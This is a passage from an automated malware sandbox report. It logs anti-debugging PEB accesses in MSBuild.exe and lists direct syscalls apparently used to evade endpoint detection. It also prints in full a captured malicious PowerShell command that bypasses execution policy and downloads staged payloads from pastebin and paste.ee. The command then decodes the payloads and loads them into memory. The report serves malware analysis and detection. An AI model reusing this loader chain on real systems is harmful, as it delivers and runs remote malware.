                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6F5B0 mov eax, dword ptr fs:[00000030h]10_2_01A6F5B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6F5B0 mov eax, dword ptr fs:[00000030h]10_2_01A6F5B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6F5B0 mov eax, dword ptr fs:[00000030h]10_2_01A6F5B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A645B1 mov eax, dword ptr fs:[00000030h]10_2_01A645B1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A645B1 mov eax, dword ptr fs:[00000030h]10_2_01A645B1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AD35BA mov eax, dword ptr fs:[00000030h]10_2_01AD35BA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AD35BA mov eax, dword ptr fs:[00000030h]10_2_01AD35BA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AD35BA mov eax, dword ptr fs:[00000030h]10_2_01AD35BA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AD35BA mov eax, dword ptr fs:[00000030h]10_2_01AD35BA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A42582 mov eax, dword ptr fs:[00000030h]10_2_01A42582
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A42582 mov ecx, dword ptr fs:[00000030h]10_2_01A42582
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3758F mov eax, dword ptr fs:[00000030h]10_2_01A3758F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3758F mov eax, dword ptr fs:[00000030h]10_2_01A3758F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3758F mov eax, dword ptr fs:[00000030h]10_2_01A3758F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A74588 mov eax, dword ptr fs:[00000030h]10_2_01A74588
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01ACB594 mov eax, dword ptr fs:[00000030h]10_2_01ACB594
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01ACB594 mov eax, dword ptr fs:[00000030h]10_2_01ACB594
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E59C mov eax, dword ptr fs:[00000030h]10_2_01A7E59C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]10_2_01A6E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]10_2_01A6E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]10_2_01A6E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]10_2_01A6E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]10_2_01A6E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]10_2_01A6E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]10_2_01A6E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]10_2_01A6E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A425E0 mov eax, dword ptr fs:[00000030h]10_2_01A425E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7C5ED mov eax, dword ptr fs:[00000030h]10_2_01A7C5ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7C5ED mov eax, dword ptr fs:[00000030h]10_2_01A7C5ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A615F4 mov eax, dword ptr fs:[00000030h]10_2_01A615F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A615F4 mov eax, dword ptr fs:[00000030h]10_2_01A615F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A615F4 mov eax, dword ptr fs:[00000030h]10_2_01A615F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A615F4 mov eax, dword ptr fs:[00000030h]10_2_01A615F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A615F4 mov eax, dword ptr fs:[00000030h]10_2_01A615F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A615F4 mov eax, dword ptr fs:[00000030h]10_2_01A615F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B135D7 mov eax, dword ptr fs:[00000030h]10_2_01B135D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B135D7 mov eax, dword ptr fs:[00000030h]10_2_01B135D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B135D7 mov eax, dword ptr fs:[00000030h]10_2_01B135D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A755C0 mov eax, dword ptr fs:[00000030h]10_2_01A755C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E5CF mov eax, dword ptr fs:[00000030h]10_2_01A7E5CF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E5CF mov eax, dword ptr fs:[00000030h]10_2_01A7E5CF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A465D0 mov eax, dword ptr fs:[00000030h]10_2_01A465D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7A5D0 mov eax, dword ptr fs:[00000030h]10_2_01A7A5D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7A5D0 mov eax, dword ptr fs:[00000030h]10_2_01A7A5D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B155C9 mov eax, dword ptr fs:[00000030h]10_2_01B155C9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01ABD5D0 mov eax, dword ptr fs:[00000030h]10_2_01ABD5D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01ABD5D0 mov ecx, dword ptr fs:[00000030h]10_2_01ABD5D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A695DA mov eax, dword ptr fs:[00000030h]10_2_01A695DA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AFB52F mov eax, dword ptr fs:[00000030h]10_2_01AFB52F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B15537 mov eax, dword ptr fs:[00000030h]10_2_01B15537
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AEF525 mov eax, dword ptr fs:[00000030h]10_2_01AEF525
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AEF525 mov eax, dword ptr fs:[00000030h]10_2_01AEF525
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AEF525 mov eax, dword ptr fs:[00000030h]10_2_01AEF525
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AEF525 mov eax, dword ptr fs:[00000030h]10_2_01AEF525
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AEF525 mov eax, dword ptr fs:[00000030h]10_2_01AEF525
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AEF525 mov eax, dword ptr fs:[00000030h]10_2_01AEF525
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AEF525 mov eax, dword ptr fs:[00000030h]10_2_01AEF525
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A50535 mov eax, dword ptr fs:[00000030h]10_2_01A50535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A50535 mov eax, dword ptr fs:[00000030h]10_2_01A50535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A50535 mov eax, dword ptr fs:[00000030h]10_2_01A50535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A50535 mov eax, dword ptr fs:[00000030h]10_2_01A50535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A50535 mov eax, dword ptr fs:[00000030h]10_2_01A50535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A50535 mov eax, dword ptr fs:[00000030h]10_2_01A50535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4D534 mov eax, dword ptr fs:[00000030h]10_2_01A4D534
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4D534 mov eax, dword ptr fs:[00000030h]10_2_01A4D534
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4D534 mov eax, dword ptr fs:[00000030h]10_2_01A4D534
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4D534 mov eax, dword ptr fs:[00000030h]10_2_01A4D534
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4D534 mov eax, dword ptr fs:[00000030h]10_2_01A4D534
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4D534 mov eax, dword ptr fs:[00000030h]10_2_01A4D534
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7D530 mov eax, dword ptr fs:[00000030h]10_2_01A7D530
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7D530 mov eax, dword ptr fs:[00000030h]10_2_01A7D530
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E53E mov eax, dword ptr fs:[00000030h]10_2_01A6E53E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E53E mov eax, dword ptr fs:[00000030h]10_2_01A6E53E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E53E mov eax, dword ptr fs:[00000030h]10_2_01A6E53E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E53E mov eax, dword ptr fs:[00000030h]10_2_01A6E53E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E53E mov eax, dword ptr fs:[00000030h]10_2_01A6E53E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A77505 mov eax, dword ptr fs:[00000030h]10_2_01A77505
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A77505 mov ecx, dword ptr fs:[00000030h]10_2_01A77505
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B14500 mov eax, dword ptr fs:[00000030h]10_2_01B14500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B14500 mov eax, dword ptr fs:[00000030h]10_2_01B14500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B14500 mov eax, dword ptr fs:[00000030h]10_2_01B14500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B14500 mov eax, dword ptr fs:[00000030h]10_2_01B14500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B14500 mov eax, dword ptr fs:[00000030h]10_2_01B14500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B14500 mov eax, dword ptr fs:[00000030h]10_2_01B14500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B14500 mov eax, dword ptr fs:[00000030h]10_2_01B14500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3B562 mov eax, dword ptr fs:[00000030h]10_2_01A3B562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7656A mov eax, dword ptr fs:[00000030h]10_2_01A7656A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7656A mov eax, dword ptr fs:[00000030h]10_2_01A7656A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7656A mov eax, dword ptr fs:[00000030h]10_2_01A7656A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7B570 mov eax, dword ptr fs:[00000030h]10_2_01A7B570
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7B570 mov eax, dword ptr fs:[00000030h]10_2_01A7B570
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A48550 mov eax, dword ptr fs:[00000030h]10_2_01A48550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A48550 mov eax, dword ptr fs:[00000030h]10_2_01A48550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A464AB mov eax, dword ptr fs:[00000030h]10_2_01A464AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A734B0 mov eax, dword ptr fs:[00000030h]10_2_01A734B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A744B0 mov ecx, dword ptr fs:[00000030h]10_2_01A744B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01ACA4B0 mov eax, dword ptr fs:[00000030h]10_2_01ACA4B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A49486 mov eax, dword ptr fs:[00000030h]10_2_01A49486
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A49486 mov eax, dword ptr fs:[00000030h]10_2_01A49486
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3B480 mov eax, dword ptr fs:[00000030h]10_2_01A3B480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A404E5 mov ecx, dword ptr fs:[00000030h]10_2_01A404E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AE94E0 mov eax, dword ptr fs:[00000030h]10_2_01AE94E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B154DB mov eax, dword ptr fs:[00000030h]10_2_01B154DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3E420 mov eax, dword ptr fs:[00000030h]10_2_01A3E420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3E420 mov eax, dword ptr fs:[00000030h]10_2_01A3E420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3E420 mov eax, dword ptr fs:[00000030h]10_2_01A3E420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3C427 mov eax, dword ptr fs:[00000030h]10_2_01A3C427
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7A430 mov eax, dword ptr fs:[00000030h]10_2_01A7A430
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A78402 mov eax, dword ptr fs:[00000030h]10_2_01A78402
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A78402 mov eax, dword ptr fs:[00000030h]10_2_01A78402
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A78402 mov eax, dword ptr fs:[00000030h]10_2_01A78402
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6340D mov eax, dword ptr fs:[00000030h]10_2_01A6340D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A41460 mov eax, dword ptr fs:[00000030h]10_2_01A41460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A41460 mov eax, dword ptr fs:[00000030h]10_2_01A41460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A41460 mov eax, dword ptr fs:[00000030h]10_2_01A41460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A41460 mov eax, dword ptr fs:[00000030h]10_2_01A41460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A41460 mov eax, dword ptr fs:[00000030h]10_2_01A41460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A5F460 mov eax, dword ptr fs:[00000030h]10_2_01A5F460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A5F460 mov eax, dword ptr fs:[00000030h]10_2_01A5F460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A5F460 mov eax, dword ptr fs:[00000030h]10_2_01A5F460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A5F460 mov eax, dword ptr fs:[00000030h]10_2_01A5F460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A5F460 mov eax, dword ptr fs:[00000030h]10_2_01A5F460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A5F460 mov eax, dword ptr fs:[00000030h]10_2_01A5F460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B1547F mov eax, dword ptr fs:[00000030h]10_2_01B1547F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6A470 mov eax, dword ptr fs:[00000030h]10_2_01A6A470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6A470 mov eax, dword ptr fs:[00000030h]10_2_01A6A470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6A470 mov eax, dword ptr fs:[00000030h]10_2_01A6A470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4B440 mov eax, dword ptr fs:[00000030h]10_2_01A4B440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4B440 mov eax, dword ptr fs:[00000030h]10_2_01A4B440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4B440 mov eax, dword ptr fs:[00000030h]10_2_01A4B440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4B440 mov eax, dword ptr fs:[00000030h]10_2_01A4B440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4B440 mov eax, dword ptr fs:[00000030h]10_2_01A4B440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4B440 mov eax, dword ptr fs:[00000030h]10_2_01A4B440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]10_2_01A7E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]10_2_01A7E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]10_2_01A7E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]10_2_01A7E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]10_2_01A7E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]10_2_01A7E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]10_2_01A7E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]10_2_01A7E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AFF453 mov eax, dword ptr fs:[00000030h]10_2_01AFF453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6245A mov eax, dword ptr fs:[00000030h]10_2_01A6245A

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Bypasses PowerShell execution policy
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
                  Encrypted powershell cmdline option found
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded Q1|~y$T 7eMS
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded Q1|~y$T 7eMSJump to behavior
                  Found direct / indirect Syscall (likely to bypass EDR)
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtSetInformationThread: Direct from: 0x77D62B4CJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtReadVirtualMemory: Direct from: 0x77D62E8CJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtCreateKey: Direct from: 0x77D62C6CJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtQueryAttributesFile: Direct from: 0x77D62E6CJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtQuerySystemInformation: Direct from: 0x77D648CCJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtQueryVolumeInformationFile: Direct from: 0x77D62F2CJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtAllocateVirtualMemory: Direct from: 0x77D648ECJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtOpenSection: Direct from: 0x77D62E0CJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtDeviceIoControlFile: Direct from: 0x77D62AECJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtQuerySystemInformation: Direct from: 0x77D62DFCJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtReadFile: Direct from: 0x77D62ADCJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtDelayExecution: Direct from: 0x77D62DDCJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtQueryInformationProcess: Direct from: 0x77D62C26Jump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtResumeThread: Direct from: 0x77D62FBCJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtWriteVirtualMemory: Direct from: 0x77D6490CJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtCreateUserProcess: Direct from: 0x77D6371CJump to behavior
